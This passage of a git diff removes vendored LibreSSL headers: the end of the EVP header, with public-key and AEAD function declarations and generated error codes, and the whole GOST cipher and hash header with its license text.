-int EVP_PKEY_CTX_ctrl(EVP_PKEY_CTX *ctx, int keytype, int optype, int cmd,
-    int p1, void *p2);
-int EVP_PKEY_CTX_ctrl_str(EVP_PKEY_CTX *ctx, const char *type,
-    const char *value);
-
-int EVP_PKEY_CTX_get_operation(EVP_PKEY_CTX *ctx);
-void EVP_PKEY_CTX_set0_keygen_info(EVP_PKEY_CTX *ctx, int *dat, int datlen);
-
-EVP_PKEY *EVP_PKEY_new_mac_key(int type, ENGINE *e, const unsigned char *key,
-    int keylen);
-
-void EVP_PKEY_CTX_set_data(EVP_PKEY_CTX *ctx, void *data);
-void *EVP_PKEY_CTX_get_data(EVP_PKEY_CTX *ctx);
-EVP_PKEY *EVP_PKEY_CTX_get0_pkey(EVP_PKEY_CTX *ctx);
-
-EVP_PKEY *EVP_PKEY_CTX_get0_peerkey(EVP_PKEY_CTX *ctx);
-
-void EVP_PKEY_CTX_set_app_data(EVP_PKEY_CTX *ctx, void *data);
-void *EVP_PKEY_CTX_get_app_data(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_sign_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_sign(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
-    const unsigned char *tbs, size_t tbslen);
-int EVP_PKEY_verify_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_verify(EVP_PKEY_CTX *ctx, const unsigned char *sig, size_t siglen,
-    const unsigned char *tbs, size_t tbslen);
-int EVP_PKEY_verify_recover_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_verify_recover(EVP_PKEY_CTX *ctx, unsigned char *rout,
-    size_t *routlen, const unsigned char *sig, size_t siglen);
-int EVP_PKEY_encrypt_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_encrypt(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen);
-int EVP_PKEY_decrypt_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_decrypt(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen);
-
-int EVP_PKEY_derive_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_derive_set_peer(EVP_PKEY_CTX *ctx, EVP_PKEY *peer);
-int EVP_PKEY_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen);
-
-typedef int EVP_PKEY_gen_cb(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_paramgen_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
-int EVP_PKEY_keygen_init(EVP_PKEY_CTX *ctx);
-int EVP_PKEY_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
-
-void EVP_PKEY_CTX_set_cb(EVP_PKEY_CTX *ctx, EVP_PKEY_gen_cb *cb);
-EVP_PKEY_gen_cb *EVP_PKEY_CTX_get_cb(EVP_PKEY_CTX *ctx);
-
-int EVP_PKEY_CTX_get_keygen_info(EVP_PKEY_CTX *ctx, int idx);
-
-void EVP_PKEY_meth_set_init(EVP_PKEY_METHOD *pmeth,
-    int (*init)(EVP_PKEY_CTX *ctx));
-
-void EVP_PKEY_meth_set_copy(EVP_PKEY_METHOD *pmeth,
-    int (*copy)(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src));
-
-void EVP_PKEY_meth_set_cleanup(EVP_PKEY_METHOD *pmeth,
-    void (*cleanup)(EVP_PKEY_CTX *ctx));
-
-void EVP_PKEY_meth_set_paramgen(EVP_PKEY_METHOD *pmeth,
-    int (*paramgen_init)(EVP_PKEY_CTX *ctx),
-    int (*paramgen)(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey));
-
-void EVP_PKEY_meth_set_keygen(EVP_PKEY_METHOD *pmeth,
-    int (*keygen_init)(EVP_PKEY_CTX *ctx),
-    int (*keygen)(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey));
-
-void EVP_PKEY_meth_set_sign(EVP_PKEY_METHOD *pmeth,
-    int (*sign_init)(EVP_PKEY_CTX *ctx),
-    int (*sign)(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
-    const unsigned char *tbs, size_t tbslen));
-
-void EVP_PKEY_meth_set_verify(EVP_PKEY_METHOD *pmeth,
-    int (*verify_init)(EVP_PKEY_CTX *ctx),
-    int (*verify)(EVP_PKEY_CTX *ctx, const unsigned char *sig, size_t siglen,
-    const unsigned char *tbs, size_t tbslen));
-
-void EVP_PKEY_meth_set_verify_recover(EVP_PKEY_METHOD *pmeth,
-    int (*verify_recover_init)(EVP_PKEY_CTX *ctx),
-    int (*verify_recover)(EVP_PKEY_CTX *ctx, unsigned char *sig,
-    size_t *siglen, const unsigned char *tbs, size_t tbslen));
-
-void EVP_PKEY_meth_set_signctx(EVP_PKEY_METHOD *pmeth,
-    int (*signctx_init)(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx),
-    int (*signctx)(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
-    EVP_MD_CTX *mctx));
-
-void EVP_PKEY_meth_set_verifyctx(EVP_PKEY_METHOD *pmeth,
-    int (*verifyctx_init)(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx),
-    int (*verifyctx)(EVP_PKEY_CTX *ctx, const unsigned char *sig, int siglen,
-    EVP_MD_CTX *mctx));
-
-void EVP_PKEY_meth_set_encrypt(EVP_PKEY_METHOD *pmeth,
-    int (*encrypt_init)(EVP_PKEY_CTX *ctx),
-    int (*encryptfn)(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen));
-
-void EVP_PKEY_meth_set_decrypt(EVP_PKEY_METHOD *pmeth,
-    int (*decrypt_init)(EVP_PKEY_CTX *ctx),
-    int (*decrypt)(EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
-    const unsigned char *in, size_t inlen));
-
-void EVP_PKEY_meth_set_derive(EVP_PKEY_METHOD *pmeth,
-    int (*derive_init)(EVP_PKEY_CTX *ctx),
-    int (*derive)(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen));
-
-void EVP_PKEY_meth_set_ctrl(EVP_PKEY_METHOD *pmeth,
-    int (*ctrl)(EVP_PKEY_CTX *ctx, int type, int p1, void *p2),
-    int (*ctrl_str)(EVP_PKEY_CTX *ctx, const char *type, const char *value));
-
-/* Authenticated Encryption with Additional Data.
- *
- * AEAD couples confidentiality and integrity in a single primtive. AEAD
- * algorithms take a key and then can seal and open individual messages. Each
- * message has a unique, per-message nonce and, optionally, additional data
- * which is authenticated but not included in the output. */
-
-struct evp_aead_st;
-typedef struct evp_aead_st EVP_AEAD;
-
-#ifndef OPENSSL_NO_AES
-/* EVP_aes_128_gcm is AES-128 in Galois Counter Mode. */
-const EVP_AEAD *EVP_aead_aes_128_gcm(void);
-/* EVP_aes_256_gcm is AES-256 in Galois Counter Mode. */
-const EVP_AEAD *EVP_aead_aes_256_gcm(void);
-#endif
-
-#if !defined(OPENSSL_NO_CHACHA) && !defined(OPENSSL_NO_POLY1305)
-/* EVP_aead_chacha20_poly1305 is ChaCha20 with a Poly1305 authenticator. */
-const EVP_AEAD *EVP_aead_chacha20_poly1305(void);
-#endif
-
-/* EVP_AEAD_key_length returns the length of the keys used. */
-size_t EVP_AEAD_key_length(const EVP_AEAD *aead);
-
-/* EVP_AEAD_nonce_length returns the length of the per-message nonce. */
-size_t EVP_AEAD_nonce_length(const EVP_AEAD *aead);
-
-/* EVP_AEAD_max_overhead returns the maximum number of additional bytes added
- * by the act of sealing data with the AEAD. */
-size_t EVP_AEAD_max_overhead(const EVP_AEAD *aead);
-
-/* EVP_AEAD_max_tag_len returns the maximum tag length when using this AEAD.
- * This * is the largest value that can be passed as a tag length to
- * EVP_AEAD_CTX_init. */
-size_t EVP_AEAD_max_tag_len(const EVP_AEAD *aead);
-
-/* An EVP_AEAD_CTX represents an AEAD algorithm configured with a specific key
- * and message-independent IV. */
-typedef struct evp_aead_ctx_st {
-	const EVP_AEAD *aead;
-	/* aead_state is an opaque pointer to the AEAD specific state. */
-	void *aead_state;
-} EVP_AEAD_CTX;
-
-/* EVP_AEAD_MAX_TAG_LENGTH is the maximum tag length used by any AEAD
- * defined in this header. */
-#define EVP_AEAD_MAX_TAG_LENGTH 16
-
-/* EVP_AEAD_DEFAULT_TAG_LENGTH is a magic value that can be passed to
- * EVP_AEAD_CTX_init to indicate that the default tag length for an AEAD
- * should be used. */
-#define EVP_AEAD_DEFAULT_TAG_LENGTH 0
-
-/* EVP_AEAD_init initializes the context for the given AEAD algorithm.
- * The implementation argument may be NULL to choose the default implementation.
- * Authentication tags may be truncated by passing a tag length. A tag length
- * of zero indicates the default tag length should be used. */
-int EVP_AEAD_CTX_init(EVP_AEAD_CTX *ctx, const EVP_AEAD *aead,
-    const unsigned char *key, size_t key_len, size_t tag_len, ENGINE *impl);
-
-/* EVP_AEAD_CTX_cleanup frees any data allocated for this context. */
-void EVP_AEAD_CTX_cleanup(EVP_AEAD_CTX *ctx);
-
-/* EVP_AEAD_CTX_seal encrypts and authenticates the input and authenticates
- * any additional data (AD), the result being written as output. One is
- * returned on success, otherwise zero.
- *
- * This function may be called (with the same EVP_AEAD_CTX) concurrently with
- * itself or EVP_AEAD_CTX_open.
- *
- * At most max_out_len bytes are written as output and, in order to ensure
- * success, this value should be the length of the input plus the result of
- * EVP_AEAD_overhead. On successful return, out_len is set to the actual
- * number of bytes written.
- *
- * The length of the nonce is must be equal to the result of
- * EVP_AEAD_nonce_length for this AEAD.
- *
- * EVP_AEAD_CTX_seal never results in a partial output. If max_out_len is
- * insufficient, zero will be returned and out_len will be set to zero.
- *
- * If the input and output are aliased then out must be <= in. */
-int EVP_AEAD_CTX_seal(const EVP_AEAD_CTX *ctx, unsigned char *out,
-    size_t *out_len, size_t max_out_len, const unsigned char *nonce,
-    size_t nonce_len, const unsigned char *in, size_t in_len,
-    const unsigned char *ad, size_t ad_len);
-
-/* EVP_AEAD_CTX_open authenticates the input and additional data, decrypting
- * the input and writing it as output. One is returned on success, otherwise
- * zero.
- *
- * This function may be called (with the same EVP_AEAD_CTX) concurrently with
- * itself or EVP_AEAD_CTX_seal.
- *
- * At most the number of input bytes are written as output. In order to ensure
- * success, max_out_len should be at least the same as the input length. On
- * successful return out_len is set to the actual number of bytes written.
- *
- * The length of nonce must be equal to the result of EVP_AEAD_nonce_length
- * for this AEAD.
- *
- * EVP_AEAD_CTX_open never results in a partial output. If max_out_len is
- * insufficient, zero will be returned and out_len will be set to zero.
- *
- * If the input and output are aliased then out must be <= in. */
-int EVP_AEAD_CTX_open(const EVP_AEAD_CTX *ctx, unsigned char *out,
-    size_t *out_len, size_t max_out_len, const unsigned char *nonce,
-    size_t nonce_len, const unsigned char *in, size_t in_len,
-    const unsigned char *ad, size_t ad_len);
-
-void EVP_add_alg_module(void);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_EVP_strings(void);
-
-/* Error codes for the EVP functions. */
-
-/* Function codes. */
-#define EVP_F_AEAD_AES_GCM_INIT				 187
-#define EVP_F_AEAD_AES_GCM_OPEN				 188
-#define EVP_F_AEAD_AES_GCM_SEAL				 189
-#define EVP_F_AEAD_CHACHA20_POLY1305_INIT		 192
-#define EVP_F_AEAD_CHACHA20_POLY1305_OPEN		 193
-#define EVP_F_AEAD_CHACHA20_POLY1305_SEAL		 194
-#define EVP_F_AEAD_CTX_OPEN				 185
-#define EVP_F_AEAD_CTX_SEAL				 186
-#define EVP_F_AESNI_INIT_KEY				 165
-#define EVP_F_AESNI_XTS_CIPHER				 176
-#define EVP_F_AES_INIT_KEY				 133
-#define EVP_F_AES_XTS					 172
-#define EVP_F_AES_XTS_CIPHER				 175
-#define EVP_F_ALG_MODULE_INIT				 177
-#define EVP_F_CAMELLIA_INIT_KEY				 159
-#define EVP_F_CMAC_INIT					 173
-#define EVP_F_D2I_PKEY					 100
-#define EVP_F_DO_SIGVER_INIT				 161
-#define EVP_F_DSAPKEY2PKCS8				 134
-#define EVP_F_DSA_PKEY2PKCS8				 135
-#define EVP_F_ECDSA_PKEY2PKCS8				 129
-#define EVP_F_ECKEY_PKEY2PKCS8				 132
-#define EVP_F_EVP_AEAD_CTX_INIT				 180
-#define EVP_F_EVP_AEAD_CTX_OPEN				 190
-#define EVP_F_EVP_AEAD_CTX_SEAL				 191
-#define EVP_F_EVP_BYTESTOKEY				 200
-#define EVP_F_EVP_CIPHERINIT_EX				 123
-#define EVP_F_EVP_CIPHER_CTX_COPY			 163
-#define EVP_F_EVP_CIPHER_CTX_CTRL			 124
-#define EVP_F_EVP_CIPHER_CTX_SET_KEY_LENGTH		 122
-#define EVP_F_EVP_CIPHER_GET_ASN1_IV			 201
-#define EVP_F_EVP_CIPHER_SET_ASN1_IV			 202
-#define EVP_F_EVP_DECRYPTFINAL_EX			 101
-#define EVP_F_EVP_DECRYPTUPDATE				 199
-#define EVP_F_EVP_DIGESTFINAL_EX			 196
-#define EVP_F_EVP_DIGESTINIT_EX				 128
-#define EVP_F_EVP_ENCRYPTFINAL_EX			 127
-#define EVP_F_EVP_ENCRYPTUPDATE				 198
-#define EVP_F_EVP_MD_CTX_COPY_EX			 110
-#define EVP_F_EVP_MD_CTX_CTRL				 195
-#define EVP_F_EVP_MD_SIZE				 162
-#define EVP_F_EVP_OPENINIT				 102
-#define EVP_F_EVP_PBE_ALG_ADD				 115
-#define EVP_F_EVP_PBE_ALG_ADD_TYPE			 160
-#define EVP_F_EVP_PBE_CIPHERINIT			 116
-#define EVP_F_EVP_PKCS82PKEY				 111
-#define EVP_F_EVP_PKCS82PKEY_BROKEN			 136
-#define EVP_F_EVP_PKEY2PKCS8_BROKEN			 113
-#define EVP_F_EVP_PKEY_COPY_PARAMETERS			 103
-#define EVP_F_EVP_PKEY_CTX_CTRL				 137
-#define EVP_F_EVP_PKEY_CTX_CTRL_STR			 150
-#define EVP_F_EVP_PKEY_CTX_DUP				 156
-#define EVP_F_EVP_PKEY_DECRYPT				 104
-#define EVP_F_EVP_PKEY_DECRYPT_INIT			 138
-#define EVP_F_EVP_PKEY_DECRYPT_OLD			 151
-#define EVP_F_EVP_PKEY_DERIVE				 153
-#define EVP_F_EVP_PKEY_DERIVE_INIT			 154
-#define EVP_F_EVP_PKEY_DERIVE_SET_PEER			 155
-#define EVP_F_EVP_PKEY_ENCRYPT				 105
-#define EVP_F_EVP_PKEY_ENCRYPT_INIT			 139
-#define EVP_F_EVP_PKEY_ENCRYPT_OLD			 152
-#define EVP_F_EVP_PKEY_GET1_DH				 119
-#define EVP_F_EVP_PKEY_GET1_DSA				 120
-#define EVP_F_EVP_PKEY_GET1_ECDSA			 130
-#define EVP_F_EVP_PKEY_GET1_EC_KEY			 131
-#define EVP_F_EVP_PKEY_GET1_RSA				 121
-#define EVP_F_EVP_PKEY_KEYGEN				 146
-#define EVP_F_EVP_PKEY_KEYGEN_INIT			 147
-#define EVP_F_EVP_PKEY_NEW				 106
-#define EVP_F_EVP_PKEY_PARAMGEN				 148
-#define EVP_F_EVP_PKEY_PARAMGEN_INIT			 149
-#define EVP_F_EVP_PKEY_SIGN				 140
-#define EVP_F_EVP_PKEY_SIGN_INIT			 141
-#define EVP_F_EVP_PKEY_VERIFY				 142
-#define EVP_F_EVP_PKEY_VERIFY_INIT			 143
-#define EVP_F_EVP_PKEY_VERIFY_RECOVER			 144
-#define EVP_F_EVP_PKEY_VERIFY_RECOVER_INIT		 145
-#define EVP_F_EVP_RIJNDAEL				 126
-#define EVP_F_EVP_SIGNFINAL				 107
-#define EVP_F_EVP_VERIFYFINAL				 108
-#define EVP_F_FIPS_CIPHERINIT				 166
-#define EVP_F_FIPS_CIPHER_CTX_COPY			 170
-#define EVP_F_FIPS_CIPHER_CTX_CTRL			 167
-#define EVP_F_FIPS_CIPHER_CTX_SET_KEY_LENGTH		 171
-#define EVP_F_FIPS_DIGESTINIT				 168
-#define EVP_F_FIPS_MD_CTX_COPY				 169
-#define EVP_F_HMAC_INIT_EX				 174
-#define EVP_F_INT_CTX_NEW				 157
-#define EVP_F_PKCS5_PBE_KEYIVGEN			 117
-#define EVP_F_PKCS5_V2_PBE_KEYIVGEN			 118
-#define EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN			 164
-#define EVP_F_PKCS8_SET_BROKEN				 112
-#define EVP_F_PKEY_SET_TYPE				 158
-#define EVP_F_RC2_GET_ASN1_TYPE_AND_IV			 197
-#define EVP_F_RC2_MAGIC_TO_METH				 109
-#define EVP_F_RC5_CTRL					 125
-
-/* Reason codes. */
-#define EVP_R_AES_IV_SETUP_FAILED			 162
-#define EVP_R_AES_KEY_SETUP_FAILED			 143
-#define EVP_R_ASN1_LIB					 140
-#define EVP_R_BAD_BLOCK_LENGTH				 136
-#define EVP_R_BAD_DECRYPT				 100
-#define EVP_R_BAD_KEY_LENGTH				 137
-#define EVP_R_BN_DECODE_ERROR				 112
-#define EVP_R_BN_PUBKEY_ERROR				 113
-#define EVP_R_BUFFER_TOO_SMALL				 155
-#define EVP_R_CAMELLIA_KEY_SETUP_FAILED			 157
-#define EVP_R_CIPHER_PARAMETER_ERROR			 122
-#define EVP_R_COMMAND_NOT_SUPPORTED			 147
-#define EVP_R_CTRL_NOT_IMPLEMENTED			 132
-#define EVP_R_CTRL_OPERATION_NOT_IMPLEMENTED		 133
-#define EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH		 138
-#define EVP_R_DECODE_ERROR				 114
-#define EVP_R_DIFFERENT_KEY_TYPES			 101
-#define EVP_R_DIFFERENT_PARAMETERS			 153
-#define EVP_R_DISABLED_FOR_FIPS				 163
-#define EVP_R_ENCODE_ERROR				 115
-#define EVP_R_ERROR_LOADING_SECTION			 165
-#define EVP_R_ERROR_SETTING_FIPS_MODE			 166
-#define EVP_R_EVP_PBE_CIPHERINIT_ERROR			 119
-#define EVP_R_EXPECTING_AN_RSA_KEY			 127
-#define EVP_R_EXPECTING_A_DH_KEY			 128
-#define EVP_R_EXPECTING_A_DSA_KEY			 129
-#define EVP_R_EXPECTING_A_ECDSA_KEY			 141
-#define EVP_R_EXPECTING_A_EC_KEY			 142
-#define EVP_R_FIPS_MODE_NOT_SUPPORTED			 167
-#define EVP_R_INITIALIZATION_ERROR			 134
-#define EVP_R_INPUT_NOT_INITIALIZED			 111
-#define EVP_R_INVALID_DIGEST				 152
-#define EVP_R_INVALID_FIPS_MODE				 168
-#define EVP_R_INVALID_KEY_LENGTH			 130
-#define EVP_R_INVALID_OPERATION				 148
-#define EVP_R_IV_TOO_LARGE				 102
-#define EVP_R_KEYGEN_FAILURE				 120
-#define EVP_R_MESSAGE_DIGEST_IS_NULL			 159
-#define EVP_R_METHOD_NOT_SUPPORTED			 144
-#define EVP_R_MISSING_PARAMETERS			 103
-#define EVP_R_NO_CIPHER_SET				 131
-#define EVP_R_NO_DEFAULT_DIGEST				 158
-#define EVP_R_NO_DIGEST_SET				 139
-#define EVP_R_NO_DSA_PARAMETERS				 116
-#define EVP_R_NO_KEY_SET				 154
-#define EVP_R_NO_OPERATION_SET				 149
-#define EVP_R_NO_SIGN_FUNCTION_CONFIGURED		 104
-#define EVP_R_NO_VERIFY_FUNCTION_CONFIGURED		 105
-#define EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE	 150
-#define EVP_R_OPERATON_NOT_INITIALIZED			 151
-#define EVP_R_OUTPUT_ALIASES_INPUT			 172
-#define EVP_R_PKCS8_UNKNOWN_BROKEN_TYPE			 117
-#define EVP_R_PRIVATE_KEY_DECODE_ERROR			 145
-#define EVP_R_PRIVATE_KEY_ENCODE_ERROR			 146
-#define EVP_R_PUBLIC_KEY_NOT_RSA			 106
-#define EVP_R_TAG_TOO_LARGE				 171
-#define EVP_R_TOO_LARGE					 164
-#define EVP_R_UNKNOWN_CIPHER				 160
-#define EVP_R_UNKNOWN_DIGEST				 161
-#define EVP_R_UNKNOWN_OPTION				 169
-#define EVP_R_UNKNOWN_PBE_ALGORITHM			 121
-#define EVP_R_UNSUPORTED_NUMBER_OF_ROUNDS		 135
-#define EVP_R_UNSUPPORTED_ALGORITHM			 156
-#define EVP_R_UNSUPPORTED_CIPHER			 107
-#define EVP_R_UNSUPPORTED_KEYLENGTH			 123
-#define EVP_R_UNSUPPORTED_KEY_DERIVATION_FUNCTION	 124
-#define EVP_R_UNSUPPORTED_KEY_SIZE			 108
-#define EVP_R_UNSUPPORTED_PRF				 125
-#define EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM		 118
-#define EVP_R_UNSUPPORTED_SALT_TYPE			 126
-#define EVP_R_WRONG_FINAL_BLOCK_LENGTH			 109
-#define EVP_R_WRONG_PUBLIC_KEY_TYPE			 110
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/gost.h b/thirdparty/libressl/include/openssl/gost.h
deleted file mode 100644
index 092f96f..0000000
--- a/thirdparty/libressl/include/openssl/gost.h
+++ /dev/null
@@ -1,266 +0,0 @@
-/* $OpenBSD: gost.h,v 1.3 2016/09/04 17:02:31 jsing Exp $ */
-/*
- * Copyright (c) 2014 Dmitry Eremin-Solenikov <dbaryshkov@gmail.com>
- * Copyright (c) 2005-2006 Cryptocom LTD
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- */
-
-#ifndef HEADER_GOST_H
-#define HEADER_GOST_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_GOST
-#error GOST is disabled.
-#endif
-
-#include <openssl/asn1t.h>
-#include <openssl/ec.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-typedef struct gost2814789_key_st {
-	unsigned int key[8];
-	unsigned int k87[256],k65[256],k43[256],k21[256];
-	unsigned int count;
-	unsigned key_meshing : 1;
-} GOST2814789_KEY;
-
-int Gost2814789_set_sbox(GOST2814789_KEY *key, int nid);
-int Gost2814789_set_key(GOST2814789_KEY *key,
-		const unsigned char *userKey, const int bits);
-void Gost2814789_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	GOST2814789_KEY *key, const int enc);
-void Gost2814789_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, GOST2814789_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Gost2814789_cnt_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, GOST2814789_KEY *key,
-	unsigned char *ivec, unsigned char *cnt_buf, int *num);
-
-typedef struct {
-	ASN1_OCTET_STRING *iv;
-	ASN1_OBJECT *enc_param_set;
-} GOST_CIPHER_PARAMS;
-
-GOST_CIPHER_PARAMS *GOST_CIPHER_PARAMS_new(void);
-void GOST_CIPHER_PARAMS_free(GOST_CIPHER_PARAMS *a);
-GOST_CIPHER_PARAMS *d2i_GOST_CIPHER_PARAMS(GOST_CIPHER_PARAMS **a, const unsigned char **in, long len);
-int i2d_GOST_CIPHER_PARAMS(GOST_CIPHER_PARAMS *a, unsigned char **out);
-extern const ASN1_ITEM GOST_CIPHER_PARAMS_it;
-
-#define GOST2814789IMIT_LENGTH 4
-#define GOST2814789IMIT_CBLOCK 8
-#define GOST2814789IMIT_LONG unsigned int
-
-typedef struct GOST2814789IMITstate_st {
-	GOST2814789IMIT_LONG	Nl, Nh;
-	unsigned char		data[GOST2814789IMIT_CBLOCK];
-	unsigned int		num;
-
-	GOST2814789_KEY		cipher;
-	unsigned char		mac[GOST2814789IMIT_CBLOCK];
-} GOST2814789IMIT_CTX;
-
-/* Note, also removed second parameter and removed dctx->cipher setting */
-int GOST2814789IMIT_Init(GOST2814789IMIT_CTX *c, int nid);
-int GOST2814789IMIT_Update(GOST2814789IMIT_CTX *c, const void *data, size_t len);
-int GOST2814789IMIT_Final(unsigned char *md, GOST2814789IMIT_CTX *c);
-void GOST2814789IMIT_Transform(GOST2814789IMIT_CTX *c, const unsigned char *data);
-unsigned char *GOST2814789IMIT(const unsigned char *d, size_t n,
-		unsigned char *md, int nid,
-		const unsigned char *key, const unsigned char *iv);
-
-#define GOSTR341194_LONG unsigned int
-
-#define GOSTR341194_LENGTH	32
-#define GOSTR341194_CBLOCK	32
-#define GOSTR341194_LBLOCK	(GOSTR341194_CBLOCK/4)
-
-typedef struct GOSTR341194state_st {
-	GOSTR341194_LONG	Nl, Nh;
-	GOSTR341194_LONG	data[GOSTR341194_LBLOCK];
-	unsigned int		num;
-
-	GOST2814789_KEY		cipher;
-	unsigned char		H[GOSTR341194_CBLOCK];
-	unsigned char		S[GOSTR341194_CBLOCK];
-} GOSTR341194_CTX;
-
-/* Note, also removed second parameter and removed dctx->cipher setting */
-int GOSTR341194_Init(GOSTR341194_CTX *c, int nid);
-int GOSTR341194_Update(GOSTR341194_CTX *c, const void *data, size_t len);
-int GOSTR341194_Final(unsigned char *md, GOSTR341194_CTX *c);
-void GOSTR341194_Transform(GOSTR341194_CTX *c, const unsigned char *data);
-unsigned char *GOSTR341194(const unsigned char *d, size_t n,unsigned char *md, int nid);
-
-#if defined(_LP64)
-#define STREEBOG_LONG64 unsigned long
-#define U64(C)     C##UL
-#else
-#define STREEBOG_LONG64 unsigned long long
-#define U64(C)     C##ULL
-#endif
-
-#define STREEBOG_LBLOCK 8
-#define STREEBOG_CBLOCK 64
-#define STREEBOG256_LENGTH 32
-#define STREEBOG512_LENGTH 64
-
-typedef struct STREEBOGstate_st {
-	STREEBOG_LONG64	data[STREEBOG_LBLOCK];
-	unsigned int	num;
-	unsigned int	md_len;
-	STREEBOG_LONG64	h[STREEBOG_LBLOCK];
-	STREEBOG_LONG64 N[STREEBOG_LBLOCK];
-	STREEBOG_LONG64 Sigma[STREEBOG_LBLOCK];
-} STREEBOG_CTX;
-
-int STREEBOG256_Init(STREEBOG_CTX *c);
-int STREEBOG256_Update(STREEBOG_CTX *c, const void *data, size_t len);
-int STREEBOG256_Final(unsigned char *md, STREEBOG_CTX *c);
-void STREEBOG256_Transform(STREEBOG_CTX *c, const unsigned char *data);
-unsigned char *STREEBOG256(const unsigned char *d, size_t n,unsigned char *md);
-
-int STREEBOG512_Init(STREEBOG_CTX *c);
-int STREEBOG512_Update(STREEBOG_CTX *c, const void *data, size_t len);
-int STREEBOG512_Final(unsigned char *md, STREEBOG_CTX *c);
-void STREEBOG512_Transform(STREEBOG_CTX *c, const unsigned char *data);
-unsigned char *STREEBOG512(const unsigned char *d, size_t n,unsigned char *md);
-
-typedef struct gost_key_st GOST_KEY;
-GOST_KEY *GOST_KEY_new(void);
-void GOST_KEY_free(GOST_KEY * r);
-int GOST_KEY_check_key(const GOST_KEY * eckey);
-int GOST_KEY_set_public_key_affine_coordinates(GOST_KEY * key, BIGNUM * x, BIGNUM * y);
-const EC_GROUP * GOST_KEY_get0_group(const GOST_KEY * key);
-int GOST_KEY_set_group(GOST_KEY * key, const EC_GROUP * group);
-int GOST_KEY_get_digest(const GOST_KEY * key);
-int GOST_KEY_set_digest(GOST_KEY * key, int digest_nid);
-const BIGNUM * GOST_KEY_get0_private_key(const GOST_KEY * key);
-int GOST_KEY_set_private_key(GOST_KEY * key, const BIGNUM * priv_key);
-const EC_POINT * GOST_KEY_get0_public_key(const GOST_KEY * key);
-int GOST_KEY_set_public_key(GOST_KEY * key, const EC_POINT * pub_key);
-size_t GOST_KEY_get_size(const GOST_KEY * r);
-
-/* Gost-specific pmeth control-function parameters */
-/* For GOST R34.10 parameters */
-#define EVP_PKEY_CTRL_GOST_PARAMSET	(EVP_PKEY_ALG_CTRL+1)
